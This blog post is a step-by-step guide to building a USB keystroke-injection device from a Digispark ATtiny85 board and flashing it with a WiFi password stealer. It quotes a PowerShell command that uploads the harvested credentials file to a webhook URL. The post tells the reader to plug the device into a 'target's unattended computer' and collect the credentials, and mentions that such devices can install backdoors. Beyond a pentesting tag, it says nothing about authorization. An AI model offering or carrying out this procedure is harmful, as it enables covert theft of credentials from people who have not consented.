ATTINY85 Rubber Ducky
The USB Rubber Ducky, made popular by Hak5, is an amazing little tool. This innocent looking “USB Drive” actually emulates a computer keyboard and is capable of typing at incredible speeds. Plugging this device in an unlocked target computer allows you to extract passwords or install backdoors in a matter of seconds.
In this blog post, we’ll build our very own Rubber Ducky using an extremely cheap (and tiny) development board, the Digispark ATtiny 85.
You’ll only need to purchase 1 item: one or more Digispark ATtiny 85 boards:
- single board (NA)
- 10-pack (NA)
You’ll also need to download some software:
Getting started ¶
Preparing the IDE ¶
After installing the Arduino Integrated Development Environment (IDE), you’ll need to add an additional Board Manager.
To do this, open the IDE software, click File > Preferences, and paste the following URL next to Additional Boards Manager URLs:
You can now install the Board Manager for our ATtiny via Tools > Board “Arduino Uno” > Boards Manager…. In the textbox at the top, type digispark and install the Digistump AVR Boards board manager.
Installing the Digistump Arduino drivers ¶
- Download the drivers by downloading the Digistump.Drivers.zip from the abovementioned link
- Unzip the downloaded zip
- Run Install Drivers.exe
Preparing the payload ¶
Next, we’ll want to get some firmware to flash to our ATtiny board.
We can find some payloads in this Github repo but searching online for “ATtiny Rubber Ducky” will find you others as well.
For example, you could grab the code for a WiFi password stealer.
Copy the code or download the file and open it in the Arduino IDE.
Modify the code where necessary.
Note that this payload sends the WiFi credentials to a webhook.
Make sure you modify the line that says
powershell Invoke-WebRequest -Uri https://webhook.site/<ADD-WEBHOOK-ADDRESS-HERE> -Method POST -InFile Wi-Fi-PASS.
Add your own unique URL from https://webhook.site/ or replace the link with your own WebHook listener.
Flashing the payload on the board ¶
You can now flash the code to the Digispark.
Make sure the IDE is setup for our ATtiny board.
Check that Tools > Board “Digispark (Default - 16.5mhz)” is selected.
Also check that the correct COM port is selected, e.g. Tools > Port “COM1”.
Hit the upload button and plug in the board once the status message asks you to do so.
If it was already plugged in, you may need to unplug it and plug it back it.
Once the upload is finished, you can remove the Digispark.
Using the Rubber Ducky ¶
To make the board even more innocent-looking, or just to protect it against accidental bumping, you can put it in a 3D printed case, like one of these:
Take it with you to your target’s unattended computer and plug it in.
Once the LED turns on, the payload is finished and you can unplug the Digispark.
Keep an eye on your WebHook listener and you should soon see the WiFi credentials of your target appear in the output.
Pentesting Rubber Ducky Digispark ATtiny 85
2021-02-03 (Last updated: 2021-02-03)